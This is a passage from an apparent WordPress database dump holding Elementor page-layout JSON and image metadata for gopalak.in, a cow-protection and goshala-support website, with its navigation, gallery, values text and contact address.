here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9597,1614,'_elementor_page_assets','a:0:{}'),(9600,1615,'_wp_attached_file','2022/10/logo1211.png'),(9601,1615,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:1010;s:4:\"file\";s:20:\"2022/10/logo1211.png\";s:8:\"filesize\";i:62621;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"logo1211-285x300.png\";s:5:\"width\";i:285;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29342;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"logo1211-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13104;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"logo1211-768x808.png\";s:5:\"width\";i:768;s:6:\"height\";i:808;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:92371;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:20:\"logo1211-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31076;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:18:\"logo1211-50x53.png\";s:5:\"width\";i:50;s:6:\"height\";i:53;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3720;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:20:\"logo1211-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8280;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:18:\"logo1211-48x51.png\";s:5:\"width\";i:48;s:6:\"height\";i:51;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3564;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:18:\"logo1211-48x51.png\";s:5:\"width\";i:48;s:6:\"height\";i:51;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3564;}s:24:\"elementor_custom_150x150\";a:4:{s:4:\"file\";s:72:\"elementor/thumbs/logo1211-pw1l8axzoi47k120xg18dlr80mpvkgign2g86c457g.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"elementor_custom_75x\";a:4:{s:4:\"file\";s:72:\"elementor/thumbs/logo1211-pw1l8axyrm0gi2xid7die7qxy8q0484aa3vz1kd0ie.png\";s:5:\"width\";i:75;s:6:\"height\";i:0;s:9:\"mime-type\";s:9:\"image/png\";}s:22:\"elementor_custom_75x75\";a:4:{s:4:\"file\";s:72:\"elementor/thumbs/logo1211-pw1l8axyrm0vuixq49dusjmg8mk5kn3o880cka986m.png\";s:5:\"width\";i:75;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9610,1617,'_elementor_edit_mode','builder'),(9611,1617,'_elementor_template_type','wp-page'),(9612,1617,'_elementor_version','3.7.8'),(9613,1617,'_wp_page_template','elementor_canvas'),(9614,1617,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"